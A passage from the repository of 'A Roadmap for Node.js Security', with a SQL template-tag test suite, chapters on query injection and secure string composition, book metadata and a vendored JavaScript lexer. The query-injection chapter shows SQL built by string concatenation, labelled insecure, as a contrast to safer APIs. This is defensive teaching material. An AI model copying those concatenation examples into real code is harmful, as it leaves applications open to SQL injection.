    "eslint-config-strict": "*",
    "eslint-config-standard": "*",
    "mocha": ">=4.0.1",
    "standard": "*"
  },
  "scripts": {
    "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
  },
  "eslintConfig": {
    "extends": [
      "strict",
      "standard"
    ]
  }
}


================================================
FILE: chapter-7/examples/sql/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* eslint "no-magic-numbers": off */

const { expect } = require('chai')
const { describe, it } = require('mocha')
const index = require('../index')

function tokens (...chunks) {
  const lexer = index.makeLexer()
  const out = []
  for (let i = 0, len = chunks.length; i < len; ++i) {
    out.push(lexer(chunks[i]) || '_')
  }
  return out.join(',')
}

describe('sql template tags', () => {
  describe('lexer', () => {
    it('empty string', () => {
      expect(tokens('')).to.equal('_')
    })
    it('hash comments', () => {
      expect(tokens(' # "foo\n', '')).to.equal('_,_')
    })
    it('dash comments', () => {
      expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
    })
    it('block comments', () => {
      expect(tokens(' /* `foo */', '')).to.equal('_,_')
    })
    it('dq', () => {
      expect(tokens('SELECT "foo"')).to.equal('_')
      expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
      expect(tokens('SELECT "', '"')).to.equal('",_')
      expect(tokens('SELECT "x', '"')).to.equal('",_')
      expect(tokens('SELECT "\'', '"')).to.equal('",_')
      expect(tokens('SELECT "`', '"')).to.equal('",_')
      expect(tokens('SELECT """', '"')).to.equal('",_')
      expect(tokens('SELECT "\\"', '"')).to.equal('",_')
    })
    it('sq', () => {
      expect(tokens('SELECT \'foo\'')).to.equal('_')
      expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
      expect(tokens('SELECT \'', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
    })
    it('bq', () => {
      expect(tokens('SELECT `foo`')).to.equal('_')
      expect(tokens('SELECT "foo", `foo`')).to.equal('_')
      expect(tokens('SELECT `', '`')).to.equal('`,_')
      expect(tokens('SELECT `x', '`')).to.equal('`,_')
      expect(tokens('SELECT `\'', '`')).to.equal('`,_')
      expect(tokens('SELECT `"', '`')).to.equal('`,_')
      expect(tokens('SELECT ```', '`')).to.equal('`,_')
      expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
    })
  })

  function runTagTest (golden, test) {
    // Run multiply to test memoization bugs.
    for (let i = 3; --i >= 0;) {
      let result = test()
      if (result instanceof index.SqlFragment) {
        result = result.toString()
      } else {
        throw new Error(`Expected SqlFragment not ${result}`)
      }
      expect(result).to.equal(golden)
    }
  }

  describe('sql', () => {
    it('numbers', () => {
      runTagTest(
        'SELECT 2',
        () => index.sql`SELECT ${1 + 1}`)
    })
    it('date', () => {
      runTagTest(
        `SELECT '2000-01-01 00:00:00.000'`,
        () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
    })
    it('string', () => {
      runTagTest(
        `SELECT 'Hello, World!\\n'`,
        () => index.sql`SELECT ${'Hello, World!\n'}`)
    })
    it('identifier', () => {
      runTagTest(
        'SELECT `foo`',
        () => index.sql`SELECT ${new index.Identifier('foo')}`)
    })
    it('fragment', () => {
      const fragment = new index.SqlFragment('1 + 1')
      runTagTest(
        `SELECT 1 + 1`,
        () => index.sql`SELECT ${fragment}`)
    })
    it('fragment no token merging', () => {
      const fragment = new index.SqlFragment('1 + 1')
      runTagTest(
        `SELECT 1 + 1 FROM T`,
        () => index.sql`SELECT${fragment}FROM T`)
    })
    it('string in dq string', () => {
      runTagTest(
        `SELECT "Hello, World!\\n"`,
        () => index.sql`SELECT "Hello, ${'World!'}\n"`)
    })
    it('string in sq string', () => {
      runTagTest(
        `SELECT 'Hello, World!\\n'`,
        () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
    })
    it('string after string in string', () => {
      // The following tests check obliquely that '?' is not
      // interpreted as a prepared statement meta-character
      // internally.
      runTagTest(
        `SELECT 'Hello', "World?"`,
        () => index.sql`SELECT '${'Hello'}', "World?"`)
    })
    it('string before string in string', () => {
      runTagTest(
        `SELECT 'Hello?', 'World?'`,
        () => index.sql`SELECT 'Hello?', '${'World?'}'`)
    })
    it('number after string in string', () => {
      runTagTest(
        `SELECT 'Hello?', 123`,
        () => index.sql`SELECT '${'Hello?'}', ${123}`)
    })
    it('number before string in string', () => {
      runTagTest(
        `SELECT 123, 'World?'`,
        () => index.sql`SELECT ${123}, '${'World?'}'`)
    })
    it('string in identifier', () => {
      runTagTest(
        'SELECT `foo`',
        () => index.sql`SELECT \`${'foo'}\``)
    })
    it('number in identifier', () => {
      runTagTest(
        'SELECT `foo_123`',
        () => index.sql`SELECT \`foo_${123}\``)
    })
    it('array', () => {
      const id = new index.Identifier('foo')
      const frag = new index.SqlFragment('1 + 1')
      const values = [ 123, 'foo', id, frag ]
      runTagTest(
        "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
        () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
    })
  })
})


================================================
FILE: chapter-7/libraries.md
================================================
# Library support for Safe Coding Practices

The way we structure libraries and APIs affect the idioms that are
available to developers.

If the easiest ways to express ideas are also secure against a
particular class of attack, then developers who have seen ideas
expressed those ways will tend to produce code that is secure
against that class of attack.

Next, we introduce a few such idioms, show how they can be better
addressed via a rarely used but powerful JavaScript
feature, and end with some ideas on how to foster consistent,
powerful, and secure APIs for a class of problems that often have
security consequences: composing structured strings to send to
external agents.


================================================
FILE: chapter-7/query-langs.md
================================================
# Query injection

Threats: [QUI][]

One piece of simple advice to avoid [query injection attacks][QUI] is
"just use [prepared statements][]."

This is good advice, and the [`mysql`][] library has a
solid, well-documented API for producing secure prepared statements.

Developers could do

```js
const mysql = require('mysql');
...
connection.query(
    'SELECT * FROM T WHERE x = ?, y = ?, z = ?',
    [                          x,     y,     z],
    callback);
```

which is secure since `.query` calls `mysql.format` under the hood
to escape `x`, `y`, and `z`.  Enough developers still do

```js
connection.query(
    "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'",
    callback);
```

to make query injection a real problem.


Developers may not know about prepared statements, but prepared
statements have other problems:

*  They rely on a **correspondence between positional parameters**
   and the '`?`'s placeholders that they fill.  When a prepared statement
   has more substitutions than fit in a reader's working memory, they
   have to look back and forth between the prepared statement, and the
   parameter list.
*  Prepared statements do not make it easy to **compose a query** from
   simpler query fragments.  It's not easy to compute the `WHERE`
   clause separately from the result column set and then combine the
   two into a query without resorting to string concatenation
   somewhere along the line.


## Template literals

JavaScript has a rarely used feature that lets us get the best of
both worlds.


```js
connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback)
```

uses a [tagged template literal][] to allow inline expressions in SQL
syntax.

> A more advanced form of template literals are tagged template
> literals. Tags allow you to parse template literals with a
> function. The first argument of a tag function contains an array of
> string values. The remaining arguments are related to the
> expressions. In the end, your function can return your manipulated
> string (or it can return something completely different ...).

The code above is almost equivalent to

```js
connection.query(
    ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''],
                                  x         y         z
)(callback);
```

`connection.query` gets called with the parts of the static
template string specified by the author, followed by the results of
the expressions.  The final `(callback)` dispatches the query.

We can tweak SQL APIs so that, when used as template literal tags,
they escape the dynamic parts to preserve the intent of the author of
the static parts, and then re-interleave them to produce the query.

The example ([code][sql-code]) accompanying this chapter implements
this idea by defining a `mysql.sql` function that parses the static
parts to choose appropriate escapers for the dynamic parts.
We have put together a [draft PR][mysql-PR] to integrate this into
the *mysql* module.

It also provides string wrappers, `Identifier` and `SqlFragment`, to
make it easy to compose complex queries from simpler parts:

```js
// Compose a query from two fragments.
// When the value inside ${...} is a SqlFragment, no extra escaping happens.
connection.query`
    SELECT ${outputColumnsAndJoins(a, b, c)}
    WHERE  ${rowFilter(x, y, z)}
`(callback)

// Returns a SqlFragment
function rowFilter(x, y, z) {
  if (complexCondition) {
    // mysql.sql returns a SqlFragment
    return mysql.sql`X = ${x}`;
  } else {
    return mysql.sql`Y = ${y} AND Z=${z}`;
  }
}

function outputColumnsAndJoins(a, b, c) {
  return mysql.sql`...`;
}
```

----

Our goal was to make the easiest way to express an idea a secure way.

As seen below, this template tag API is the shortest way to express
this idea as shown below.  It is also tolerant to small variations
&mdash; the author may leave out quotes since the tag implementation
knows whether a substitution is inside quotes.

Shorter & tolerant != easier, but we hope that being shorter, more
robust, more secure, and easy to compose will make it a good migration
target for teams that realize they have a problem with SQL injection.
We also hope these factors will cause developers who have been through
such a migration to continue to use it in subsequent projects where it
may spread to other developers.


```js
// Proposed: Secure, tolerant, composes well.
connection.query`SELECT * FROM T WHERE x=${x}`(callback)
connection.query`SELECT * FROM T WHERE x="${x}"`(callback)

// String concatenation.  Insecure, composes well.
connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)

// String concatenation is not tolerant.
// Broken in a way that will be caught during casual testing.
connection.query('SELECT * FROM T WHERE x = ' + x, callback)
connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)

// Prepared Statements.  Secure, composes badly, positional parameters.
connection.query('SELECT * FROM T WHERE x = ?', x, callback)
connection.query('SELECT * FROM T WHERE x = "?"', x, callback)  // Subtly broken
```


[`mysql`]: https://www.npmjs.com/package/mysql
[QUI]: ../chapter-1/threat-QUI.md
[prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
[tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
[sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
[mysql-PR]: https://github.com/mysqljs/mysql/pull/1926


================================================
FILE: chapter-7/structured-strings.md
================================================
# Structured Strings

Both of the previously discussed problems, query injection and shell
injection, are facets of a common problem: it is hard to securely
compose strings to send outside the process.  In the first case,
we send a query string to a database via a file descriptor bound to a
network socket or an IPC endpoint.  In the second, we send a string
via a syscall wrapper, to spawn a child process.

## Success Criteria

We can securely compose strings for external endpoints if:

*  Developers routinely use tools to produce structured strings
   that preserve developers' intent even in the face of inputs
   crafted by a skilled attacker, and/or
*  Where developers do not, the backends grant no authority based on
   the structure of the string, and the authority granted ambiently is
   so small as to not be abusable.

Nailing down the definition of *intent* is hard, but here's an example
of how we can in one context.  Consider

```js
"SELECT * FROM T WHERE id=" + f(accountNumber)
```

A reasonable reader would conclude that the author intended:

*  That the result specifies one statement, a select statement.
*  That `f(accountNumber)` specifies only a simple value that
   can be compared to values in the *id* column.

Given that, we can say `function f(x)` preserves intent in that code
if, for any value of `accountNumber`, it throws an exception or
its output following "`SELECT * FROM T WHERE id=`" parses as a
single number or string literal token.


## A possible solution

### Change the world so we can give simple answers to hard questions.

Extend existing APIs so that whenever a developer is composing a
string to send outside the `node` process, they have a template
literal tag based API that is more secure than string concatenation.

Then, we can give developers a simple piece of advice:

> If you're composing a string that will end up outside node, use
> a template tag.

Template tags will have implementation bugs, but fixing one template
tag is easier than fixing many expressions of the form
`("foo " + bar + " baz")`.


### A common style guide for tag implementers.

It would help developers if these template literal tags had some
consistency across libraries.  We've already briefly discussed ways to
make template tags more discoverable and usable when talking about
ways to treat [generated code][synthetic modules] as first class.

We propose a style guide for tag authors.
Others will probably have better ideas as to what it should contain, but
to get a discussion started:

-  Functions that compose or represent a string whose recipient is outside
   the node runtime should accept template tags.
   Examples include `mysql.format` which composes a string of SQL.
-  These functions should return a typed string wrapper.
   For example, if the output is a string of *SQL* tokens,
   then return an instance of:
   ```js
   function SqlFragment(s) {
     if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
     this.content = String(s);
   }
   SqlFragment.prototype.toString = (() => this.content);
   ```
   Don't re-escape `SqlFragment`s received as interpolation values
   where they make sense.
-  See if you can reuse string wrappers from a library before rolling
   your own to encourage interoperability.
   If a library defines a type representing a fragment of HTML, use that
   as long as your operator can uphold the type's contract.
   For example if the type has a particular [security contract][],
   make sure that you preserve that security contract.
   You may assume that wrapped strings come from a source that upheld
   the contract.
   Producing a value that doesn't uphold its contract when your inputs do
   is a bug, but assuming incorrectly that type contracts hold for your
   inputs is not.
   If you can double check inputs, great!
-  The canonical way to test whether a function was (very probably)
   called as a template tag is
   ```js
   function (a, ...b) {
     if (Array.isArray(a) && Array.isArray(a.raw)
         && Object.isFrozen(a)
         && a.length === b.length + 1) {
       // Treat as template tag.
     }
     // Handle non template tag use.
   }
   ```
-  When a template tag takes options objects, it should
   be possible to curry those before invoking the function as a tag.
   The following passes some environment variables and a working directory
   before the command:
   ```js
   shelljs.exec({ env: ..., cwd: ... })`cat ...`
   ```
-  When a template tag takes a `callback`, the template tag should
   return a function that will receive the callback.
   The following uses a template tag that returns a function that
   takes a callback:
   ```js
   myConnection.query`SELECT ...`(callback)
   ```
-  Where possible, allow indenting multi-line template tags.
   Use the first line with non-whitespace characters as a cue
   when stripping whitespace from the rest of the lines.

## Alternatives

Database abstractions like object-relational mappings are a great way
to get developers out of the messy business of composing queries.

There are still niche use cases like ad-hoc reporting that require
composing queries, and solving the problem for database queries does
not solve it for strings sent elsewhere, e.g. shells.

Builder APIs provide a flexible way to compose structured content.
For example,

```java
  new QueryBuilder()
  .select()
  .innerJoin(...).on(...)
  .columns(...)
  .where(...)
  .orderBy(...)
  .build()
```

The explicit method calls specify the structure of the resulting
string, so controlling parameters doesn't grant control of sentence
structure, and control of one parameter doesn't allow reinterpreting
part of the query specified by an uncontrolled parameter.

In JavaScript we prefer tagged templates to builders.  These APIs can
be syntactically heavy and developers have to discover and learn them.
We hope that adoption with template tags will be easier because:

*  Tagged templates are syntactically lighter so easier to write.
*  Someone unfamiliar with the API, but familiar with the query language, will
   have to do less work to leverage the one to understand the other making
   tagged templates easier to read and adapt for one's own work.
*  Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
   as strings unless there is a builder API for the sub-language.


[security contract]: https://github.com/google/safe-html-types
[synthetic modules]: ../chapter-2/synthetic-modules.html


================================================
FILE: cover.md
================================================
# A Roadmap for Node.js Security

Node.js has a vibrant community of application developers and library
authors built around a mature and well-maintained core runtime and
library set.  Its growing popularity is already drawing more attention
from attackers.  This roadmap discusses how some Node.js projects
address security challenges, along with ways to make it easier
for more projects to address these challenges in a thorough and
consistent manner.

This is not the opinion of any organization.  It is the considered
opinion of
[some computer security professionals and Node.js enthusiasts][contributors]
who have worked to make it easier to write secure, robust software on
other platforms; who like a lot about Node.js; and who would like to
help make it better.

Our intended audience is Node.js library and infrastructure
maintainers who want to stay ahead of the increased scrutiny that
Node.js is getting from attackers.  We have not researched whether,
and do not assert that, any stack is inherently more or less secure
than any other.

Node.js security is especially important for “primary targets”.
Targets are often subdivided into "primary targets" and "targets of
opportunity."  One attacks the latter if one happens to see a
vulnerability.  One goes out of their way to find vulnerabilities in
the former.  The practices which prevent one from becoming a target of
opportunity might not be enough if one is a primary target of an actor
with resources at their disposal.  We hope that the ideas we present
might help primary targets to defeat attacks while making targets of
opportunity rarer and the entire ecosystem more secure.

When addressing threats, we want to make sure we preserve Node.js's
strengths.

*  Development teams can iterate quickly allowing them to explore a
   large portion of the design space.
*  Developers can use a wealth of publicly available packages to solve
   everyday problems.
*  Anyone who identifies a shared problem can write and publish a
   module to solve it, or send a pull request with a fix or extension
   to an existing project.
*  Node.js integrates with a wide variety of application containers so
   project teams have options when deciding how to deploy.
*  Using JavaScript on the front and back ends of Web applications
   allows developers to work both sides when need be.

The individual chapters are largely independent of one another:

"[Threat environment][]" discusses the kinds of threats that concern us.

"[Dynamism when you need it][]" discusses how to preserve the power of
CommonJS module linking, `vm` contexts, and runtime code generation
while making sure that, in production, only code that the development
team trusts gets run.

"[Knowing your dependencies][]" discusses ways to help development
teams make informed decisions about third-party dependencies.

"[Keeping your dependencies close][]" discusses how keeping a local
replica of portions of the larger npm repository affects security and
aids incident response.

"[Oversight][]" discusses how code-quality tools can help decouple
security review from development.

"[When all else fails][]" discusses how the development &rarr;
production pipeline and development practices can affect the ability
of security professionals to identify and respond to imminent threats.

"[Library support for safe coding practices][]" discusses idioms
that, if more widespread, might make it easier for developers to
produce secure, robust systems.

You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.

[contributors]: CONTRIBUTORS.md
[Threat environment]: chapter-1/threats.md
[Dynamism when you need it]: chapter-2/dynamism.md
[Knowing your dependencies]: chapter-3/knowing_dependencies.md
[Keeping your dependencies close]: chapter-4/close_dependencies.md
[Oversight]: chapter-5/oversight.md
[When all else fails]: chapter-6/failing.md
[Library support for safe coding practices]: chapter-7/libraries.md
[github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/


================================================
FILE: license.md
================================================
<!-- Markdown licensed under CC-BY-4.0
     Supporting code licensed under Apache License 2.0 -->

<!-- HTML courtesy https://creativecommons.org/ -->
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">A Roadmap for Node.js Security</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://github.com/google/node-sec-roadmap/" property="cc:attributionName" rel="cc:attributionURL">https://github.com/google/node-sec-roadmap/</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.


================================================
FILE: package.json
================================================
{
  "version": "1.0.0",
  "name": "@mikesamuel/nodejs_sec_book",
  "description": "Booklet about NodeJS in organizations with large security profiles",
  "homepage": "https://github.com/google/node-sec-roadmap/",
  "license": "(Apache License 2.0 OR CC-BY-4.0)",
  "author": {
    "name": "Mike Samuel",
    "email": "mikesamuel@gmail.com",
    "url": "https://github.com/mikesamuel"
  },
  "files": [
    "www/**"
  ],
  "main": "www/index.html",
  "dependencies": {
    "gitbook": ">=3.2.3",
    "gitbook-cli": ">=2.3.2",
    "gitbook-plugin-ga": "^1.0.1",
    "gitbook-plugin-links": "^3.0.1",
    "svgexport": "^0.3.2"
  },
  "private": true,
  "scripts": {
    "start": "make serve"
  }
}


================================================
FILE: styles/website.css
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

.print-button.btn.links-link {
    display: inline-block;
    width: 30px;
    font-size: 0;
    background-image: url("/images/ic_print_24dp.svg");
    background-repeat: no-repeat;
    background-position: center center;
}

.github-button.btn.links-link {
    display: inline-block;
    width: 30px;
    font-size: 0;
    background-image: url("/images/GitHub-Mark-32px.png");
    background-repeat: no-repeat;
    background-position: center center;
    background-size: 20px;
    opacity: 0.25;
}

/* Style external links */
a[href^="http://"]:not([href^="http://www.gitbook.com"]),
a[href^="https://"]:not([href^="https://www.gitbook.com"]),
a[href^="//"]:not([href^="//www.gitbook.com"]) {
    background-image: url("/images/FileExternal.svg");
    background-position: center right;
    background-repeat: no-repeat;
    background-size: 12px 12px;
    padding-right: 14px;
}


================================================
FILE: third_party/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: third_party/jslex/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: third_party/jslex/jslex.py
================================================
# Copyright 2011-2015 Ned Batchelder.  All rights reserved.
#
# Except where noted otherwise, this software is licensed under the Apache
# License, Version 2.0 (the "License"); you may not use this work except in
# compliance with the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
# For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt


"""JsLex: a lexer for Javascript"""

import re

class Tok(object):
    """A specification for a token class."""

    num = 0

    def __init__(self, name, regex, next=None):
        self.id = Tok.num
        Tok.num += 1
        self.name = name
        self.regex = regex
        self.next = next

def literals(choices, prefix="", suffix=""):
    """Create a regex from a space-separated list of literal `choices`.

    If provided, `prefix` and `suffix` will be attached to each choice
    individually.

    """
    return "|".join(prefix+re.escape(c)+suffix for c in choices.split())

class Lexer(object):
    """A generic multi-state regex-based lexer."""

    def __init__(self, states, first):
        self.regexes = {}
        self.toks = {}

        for state, rules in states.items():
            parts = []
            for tok in rules:
                groupid = "t%d" % tok.id
                self.toks[groupid] = tok
                parts.append("(?P<%s>%s)" % (groupid, tok.regex))
            self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE)

        self.state = first

    def lex(self, text):
        """Lexically analyze `text`.

        Yields pairs (`name`, `tokentext`).

        """
        end = len(text)
        state = self.state
        regexes = self.regexes
        toks = self.toks
        start = 0

        while start < end:
            for match in regexes[state].finditer(text, start):
                name = match.lastgroup
                tok = toks[name]
                toktext = match.group(name)
                start += len(toktext)
                yield (tok.name, toktext)

                if tok.next:
                    state = tok.next
                    break

        self.state = state


class JsLexer(Lexer):
    """A Javascript lexer

    >>> lexer = JsLexer()
    >>> list(lexer.lex("a = 1"))
    [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]

    This doesn't properly handle non-Ascii characters in the Javascript source.

    """

    # Because these tokens are matched as alternatives in a regex, longer possibilities
    # must appear in the list before shorter ones, for example, '>>' before '>'.
    #
    # Note that we don't have to detect malformed Javascript, only properly lex
    # correct Javascript, so much of this is simplified.

    # Details of Javascript lexical structure are taken from
    # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf

    # A useful explanation of automatic semicolon insertion is at
    # http://inimino.org/~inimino/blog/javascript_semicolons

    both_before = [
        Tok("comment",      r"/\*(.|\n)*?\*/"),
        Tok("linecomment",  r"//.*?$"),
        Tok("ws",           r"\s+"),
        Tok("keyword",      literals("""
                                break case catch class const continue debugger
                                default delete do else enum export extends
                                finally for function if import in instanceof new
                                return super switch this throw try typeof var
                                void while with
                                """, suffix=r"\b"), next='reg'),
        Tok("reserved",     literals("null true false", suffix=r"\b"), next='div'),
        Tok("id",           r"""
                            ([a-zA-Z_$   ]|\\u[0-9a-fA-Z]{4})       # first char
                            ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})*      # rest chars
                            """, next='div'),
        Tok("hnum",         r"0[xX][0-9a-fA-F]+", next='div'),
        Tok("onum",         r"0[0-7]+"),
        Tok("dnum",         r"""
                            (   (0|[1-9][0-9]*)         # DecimalIntegerLiteral
                                \.                      # dot
                                [0-9]*                  # DecimalDigits-opt
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            |
                                \.                      # dot
                                [0-9]+                  # DecimalDigits
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            |
                                (0|[1-9][0-9]*)         # DecimalIntegerLiteral
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            )
                            """, next='div'),
        Tok("punct",        literals("""
                                >>>= === !== >>> <<= >>= <= >= == != << >> && 
                                || += -= *= %= &= |= ^=
                                """), next="reg"),
        Tok("punct",        literals("++ -- ) ]"), next='div'),
        Tok("punct",        literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
        Tok("string",       r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
        Tok("string",       r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
        ]

    both_after = [
        Tok("other",        r"."),
        ]

    states = {
        'div': # slash will mean division
            both_before + [
            Tok("punct", literals("/= /"), next='reg'),
            ] + both_after,

        'reg':  # slash will mean regex
            both_before + [
            Tok("regex",
                r"""
                    /                       # opening slash
                    # First character is..
                    (   [^*\\/[]            # anything but * \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )
                    # Following characters are same, except for excluding a star
                    (   [^\\/[]             # anything but \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )*                      # many times
                    /                       # closing slash
                    [a-zA-Z0-9]*            # trailing flags
                """, next='div'),
            ] + both_after,
        }

    def __init__(self):
        super(JsLexer, self).__init__(self.states, 'reg')


def js_to_c_for_gettext(js):
    """Convert the Javascript source `js` into something resembling C for xgettext.

    What actually happens is that all the regex literals are replaced with
    "REGEX".

    """
    def escape_quotes(m):
        """Used in a regex to properly escape double quotes."""
        s = m.group(0)
        if s == '"':
            return r'\"'
        else:
            return s

    lexer = JsLexer()
    c = []
    for name, tok in lexer.lex(js):
        if name == 'regex':
            # C doesn't grok regexes, and they aren't needed for gettext,
            # so just output a string instead.
            tok = '"REGEX"'
        elif name == 'string':
            # C doesn't have single-quoted strings, so make all strings
            # double-quoted.
            if tok.startswith("'"):
                guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
                tok = '"' + guts + '"'
        elif name == 'id':
            # C can't deal with Unicode escapes in identifiers.  We don't
            # need them for gettext anyway, so replace them with something
            # innocuous
            tok = tok.replace("\\", "U")
        c.append(tok)
    return ''.join(c)